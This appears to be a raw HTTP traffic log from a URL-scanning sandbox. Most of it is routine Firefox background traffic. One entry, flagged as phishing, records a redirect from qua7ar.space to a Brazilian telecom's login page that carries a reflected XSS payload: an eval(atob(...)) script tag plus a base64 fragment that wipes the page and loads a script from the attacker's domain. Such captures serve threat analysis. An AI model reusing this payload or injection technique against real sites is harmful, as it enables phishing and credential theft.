r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 3d0727e32cd103ddd4b73f28c81758aa
197a7bf43d63723fc532c23c6dced68d5cc36652
d3f75d03561d6a47d19370292e821a86e58381466f0c69386a21175de55882ff
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "D3F75D03561D6A47D19370292E821A86E58381466F0C69386A21175DE55882FF"
Last-Modified: Fri, 11 Nov 2022 12:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2550
Expires: Mon, 14 Nov 2022 04:59:11 GMT
Date: Mon, 14 Nov 2022 04:16:41 GMT
Connection: keep-alive
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash b1e969be0f3201087da138cbc8b89f10
d0a27f525f2b242b5dafa157f126c2ba880c8809
f7e5f39372b5adcc30c27e727eee1b19e6d13ed1b54fa1ad67235dc8ee08ac51
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4521
Cache-Control: max-age=113401
Content-Type: application/ocsp-response
Date: Mon, 14 Nov 2022 04:16:41 GMT
Etag: "6370c779-1d7"
Expires: Tue, 15 Nov 2022 11:46:42 GMT
Last-Modified: Sun, 13 Nov 2022 10:31:21 GMT
Server: ECS (ska/F70D)
X-Cache: HIT
Content-Length: 471
qua7ar.space/3423-BR-uu/49563_jKK.php
45.90.58.68302 Found 0 B URL HTTP/1.1 qua7ar.space/3423-BR-uu/49563_jKK.php
IP 45.90.58.68:0
ASN #204957 Green Floid LLC
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Analyzer Verdict Alert fortinet Phishing
GET /3423-BR-uu/49563_jKK.php HTTP/1.1
Host: qua7ar.space
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 302 Found
Date: Mon, 14 Nov 2022 04:16:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vcXVhN2FyLnNwYWNlLzM0MjMtQlItdXUvbTEuanMnO2lkQ2xpY2s9Jyc7bGluaz0nJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHMpOw==
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash a8391107bfc5e4673e8a706f90f63768
5295ed0b1cb8bad4d3e851049acc7f0270937d12
ed5c27510100ffc4481be474ebcb020d147c645beb110604d5284eeeb8b97c02
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "ED5C27510100FFC4481BE474EBCB020D147C645BEB110604D5284EEEB8B97C02"
Last-Modified: Fri, 11 Nov 2022 14:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3653
Expires: Mon, 14 Nov 2022 05:17:34 GMT
Date: Mon, 14 Nov 2022 04:16:41 GMT
Connection: keep-alive
firefox.settings.services.mozilla.com/v1/
34.102.187.140200 OK 939 B URL HTTP/2 firefox.settings.services.mozilla.com/v1/
IP 34.102.187.140:0
File type JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Hash 4736bac84ca28f2b1e961159fb4ea098
1319612979f53896fcfeacd4215c2715d4951e4c
5e81213e111ddf68c7f884f72b4e06fc4dc95eb902c3cf0762236b2418840dba
GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: Alert, Retry-After, Content-Length, Backoff, Content-Type
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Mon, 14 Nov 2022 03:44:10 GMT
cache-control: public,max-age=3600
content-type: application/json
age: 1951
alt-svc: clear
X-Firefox-Spdy: h2
content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain
34.160.144.191200 OK 5.3 kB URL HTTP/2 content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain
IP 34.160.144.191:0
File type PEM certificate\012- , ASCII text
Hash 67d5a988edcda47bc3b3b3f65d32b4b6
d4f0e0da8b3690cc7da925026d3414b68c7d954f
55e4848e3ec682e808ce7ee70950f86179c43af4f81926d826a95edfda395a78
GET /chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
x-amz-id-2: TIfD0LRgP5hfpURAt7ak9I0ATNjFb+f/FOeRgLArvFszfejjc0Z7gHsh1Ev9BNw/KRK9ovOL29M=
x-amz-request-id: 6CVRP5Z7QGYHSD6F
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Mon, 14 Nov 2022 04:13:43 GMT
age: 178
last-modified: Fri, 30 Sep 2022 18:50:55 GMT
etag: "67d5a988edcda47bc3b3b3f65d32b4b6"
content-type: binary/octet-stream
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2
contile.services.mozilla.com/v1/tiles
34.117.237.239200 OK 12 B URL HTTP/2 contile.services.mozilla.com/v1/tiles
IP 34.117.237.239:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 23e88fb7b99543fb33315b29b1fad9d6
a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Mon, 14 Nov 2022 04:16:41 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2
firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
34.102.187.140200 OK 329 B URL HTTP/2 firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
IP 34.102.187.140:0
File type JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Hash 0333b0655111aa68de771adfcc4db243
63f295a144ac87a7c8e23417626724eeca68a7eb
60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: Alert, Last-Modified, Cache-Control, Retry-After, Content-Length, Expires, ETag, Pragma, Backoff, Content-Type
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Mon, 14 Nov 2022 03:44:48 GMT
cache-control: public,max-age=3600
age: 1914
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
content-type: application/json
alt-svc: clear
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 0a9a357f652868f9317812b8103ba15d
95a90c7a07b591dce7f39c6f9ab27974d1a1ed2a
16fd52c7ee6806455e724f30af8d58630a141a8a3823c48c20b5da3a71f066da
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 5308
Cache-Control: max-age=109118
Content-Type: application/ocsp-response
Date: Mon, 14 Nov 2022 04:16:42 GMT
Etag: "6370b3ac-1d7"
Expires: Tue, 15 Nov 2022 10:35:20 GMT
Last-Modified: Sun, 13 Nov 2022 09:06:52 GMT
Server: ECS (ska/F70D)
X-Cache: HIT
Content-Length: 471
push.services.mozilla.com/
54.189.35.180101 Switching Protocols 0 B URL HTTP/1.1 push.services.mozilla.com/
IP 54.189.35.180:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: /FvhvjEz2BG8EDQna/C1yA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: K61dfWW7p/2OQgvyslr9WCC17uo=
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash d6dcd32d23f1840e1ed591b30b098bb6
98defcbcd3ae6d45e12b7ed0a55d7d32da675289
f7a78d0502af553972a836a0deb4a0239a3506fcf962f23f58c73fbb84c2313b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Mon, 14 Nov 2022 04:16:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.googletagmanager.com/gtm.js?id=GTM-XXXX
142.250.74.168404 Not Found 1.6 kB URL HTTP/2 www.googletagmanager.com/gtm.js?id=GTM-XXXX
IP 142.250.74.168:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (1136)
Hash 3a837705a08f097c1302ac5482a9b383
506ae7e9b56116c19df36cc04323fbd79ff3151d
2bc4689c887a850e7e7e68388fd19a2abc6a7c961193cae4d8510e3e0489d2f4
GET /gtm.js?id=GTM-XXXX HTTP/1.1
Host: www.googletagmanager.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://auth3.tim.com.br/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 404 Not Found
cross-origin-resource-policy: cross-origin
date: Mon, 14 Nov 2022 04:16:42 GMT
content-type: text/html; charset=UTF-8
server: Google Tag Manager
content-length: 1579
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
45.60.65.22200 OK 3.4 kB URL HTTP/1.1 auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
IP 45.60.65.22:0
Hash dabc1ab1bf053fa2cf0f670f9ccd1f7a
20173f8616c06bc540f707bfeb7428698f6bf3c9
2629c1862541be7e7a7527d5bc02005c137ab3b9c3832a40bd73c66df9849dec
GET /v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2 HTTP/1.1
Host: auth3.tim.com.br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 14 Nov 2022 04:16:42 GMT
Server: Apache
Content-Language: en-US
Keep-Alive: timeout=4, max=800
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: JSESSIONID=RJJ0Wo2qNG-BpoLuZNTMb0FbCPl_WXNuN8iWOP7mrVnyLROoqnn9!309010982; path=/; HttpOnly
visid_incap_2787765=5fRYwnpZRlWaTacuZAb86inBcWMAAAAAQUIPAAAAAABbdb8vo/ujoNQUHQK1m1SG; expires=Tue, 14 Nov 2023 00:25:20 GMT; HttpOnly; path=/; Domain=.tim.com.br
incap_ses_721_2787765=L65CGVAdUiEpuyia8YEBCinBcWMAAAAAPcwcQ7h5r09FlJCqpkRfCQ==; path=/; Domain=.tim.com.br
X-CDN: Imperva
Content-Encoding: gzip
X-Iinfo: 7-7593244-7593245 NNYN CT(243 -1 0) RT(1668399401330 0) q(0 0 2 0) r(5 5) U5
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash d6dcd32d23f1840e1ed591b30b098bb6
98defcbcd3ae6d45e12b7ed0a55d7d32da675289
f7a78d0502af553972a836a0deb4a0239a3506fcf962f23f58c73fbb84c2313b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Mon, 14 Nov 2022 04:16:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 29b1503232a9cf0843bd9f0d01c0a9a5
620b3b98a58cd32175d40534dca81ef4a26d880f
1f54c0fa57ea62f131e173d4a365d6d2d4d10e0993eb69eaf9e27d3788a5daf8
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "1F54C0FA57EA62F131E173D4A365D6D2D4D10E0993EB69EAF9E27D3788A5DAF8"
Last-Modified: Sat, 12 Nov 2022 23:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15878
Expires: Mon, 14 Nov 2022 08:41:21 GMT
Date: Mon, 14 Nov 2022 04:16:43 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 29b1503232a9cf0843bd9f0d01c0a9a5
620b3b98a58cd32175d40534dca81ef4a26d880f
1f54c0fa57ea62f131e173d4a365d6d2d4d10e0993eb69eaf9e27d3788a5daf8
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "1F54C0FA57EA62F131E173D4A365D6D2D4D10E0993EB69EAF9E27D3788A5DAF8"
Last-Modified: Sat, 12 Nov 2022 23:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15878
Expires: Mon, 14 Nov 2022 08:41:21 GMT
Date: Mon, 14 Nov 2022 04:16:43 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 29b1503232a9cf0843bd9f0d01c0a9a5
620b3b98a58cd32175d40534dca81ef4a26d880f
1f54c0fa57ea62f131e173d4a365d6d2d4d10e0993eb69eaf9e27d3788a5daf8
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "1F54C0FA57EA62F131E173D4A365D6D2D4D10E0993EB69EAF9E27D3788A5DAF8"
Last-Modified: Sat, 12 Nov 2022 23:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15878
Expires: Mon, 14 Nov 2022 08:41:21 GMT
Date: Mon, 14 Nov 2022 04:16:43 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F5797e726-229b-4f42-9376-00ae67e14407.jpeg
34.120.237.76200 OK 6.5 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F5797e726-229b-4f42-9376-00ae67e14407.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash a0db3498954921b58948ad8a4e7fd49f
6b618c3ff6e589f9e01650bd0a619acb70d8004e
fa3baa9e32e455ab2eeefab0c76714bf0ff5f67a5ccd7c10b3f5c21d8138c5cf
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F5797e726-229b-4f42-9376-00ae67e14407.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 6535
x-amzn-requestid: 3333aa65-c0c7-4704-9af1-fb0a49f830fb
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bjyDtHbhoAMFSsg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637163b1-51c3e4513240b7e5662b8e6e;Sampled=0
x-amzn-remapped-date: Sun, 13 Nov 2022 21:37:53 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 6dTOcWIKFuo-Thf3zUH_1WY70yFyQkj3w2xPrb6Ntjf8TUFPVG-_lA==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 9c675215120a4ade8754c4357ef2f3ea.cloudfront.net (CloudFront), 1.1 google
date: Sun, 13 Nov 2022 21:54:01 GMT
age: 22962
etag: "6b618c3ff6e589f9e01650bd0a619acb70d8004e"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8ae99eef-8784-4c1a-8c91-bd4ef21987a2.jpeg
34.120.237.76200 OK 7.6 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8ae99eef-8784-4c1a-8c91-bd4ef21987a2.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash f4ac79607215beb845b6e7bf1e92506b
d4ac19f0373649804e9747b30552897a453db42d
ec4691a0573471e50dce4bd5db454dcd0498939aa6d1d9d39a1221ad01578a45
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8ae99eef-8784-4c1a-8c91-bd4ef21987a2.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
